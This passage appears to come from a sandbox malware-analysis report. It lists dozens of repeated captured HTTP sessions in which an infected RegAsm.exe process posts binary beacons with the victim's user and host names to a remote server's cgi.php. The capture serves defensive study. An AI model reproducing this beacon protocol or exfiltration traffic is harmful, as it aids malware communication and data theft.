                                                                                        164192.168.2.2249331185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:11.027929068 CET1358OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:11.105282068 CET1358OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:11.198427916 CET1358INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:10 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        165192.168.2.2249332185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:11.409138918 CET1359OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:11.480406046 CET1359OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:11.568466902 CET1360INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:10 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        166192.168.2.2249333185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:11.779640913 CET1360OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:11.855976105 CET1361OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:11.948838949 CET1361INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:11 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        167192.168.2.2249334185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:12.151046038 CET1362OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:12.219427109 CET1362OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:12.322355986 CET1362INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:11 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        168192.168.2.2249335185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:12.528628111 CET1363OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:12.605540991 CET1363OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:12.702702045 CET1364INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:11 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        169192.168.2.2249336185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:12.913604975 CET1364OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:12.980554104 CET1365OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:13.081151962 CET1365INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:12 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        17192.168.2.2249184185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:14.002546072 CET1164OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:14.074076891 CET1164OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:14.168911934 CET1164INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:13 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        170192.168.2.2249337185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:13.293356895 CET1366OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:13.357029915 CET1366OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:13.445018053 CET1366INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:12 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        171192.168.2.2249338185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:13.661854029 CET1367OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:13.745917082 CET1367OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:13.836047888 CET1368INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:12 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        172192.168.2.2249339185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:14.047995090 CET1368OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:14.122060061 CET1369OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:14.227580070 CET1369INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:13 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        173192.168.2.2249340185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:14.442936897 CET1370OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:14.511751890 CET1370OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:14.596332073 CET1370INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:13 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        174192.168.2.2249341185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:14.806536913 CET1371OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:14.886598110 CET1371OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:14.974221945 CET1372INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:14 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        175192.168.2.2249342185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:15.187360048 CET1372OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:15.261763096 CET1373OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:15.351310015 CET1373INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:14 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        176192.168.2.2249343185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:15.557295084 CET1374OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:15.637098074 CET1374OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:15.731775999 CET1374INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:14 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        177192.168.2.2249344185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:15.953687906 CET1375OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:16.027359009 CET1375OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:16.112185955 CET1376INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:15 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        178192.168.2.2249345185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:16.321602106 CET1376OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:16.386634111 CET1376OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:16.490418911 CET1377INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:15 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        179192.168.2.2249346185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:16.691139936 CET1378OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:16.761456966 CET1378OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:16.849535942 CET1378INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:15 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        18192.168.2.2249185185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
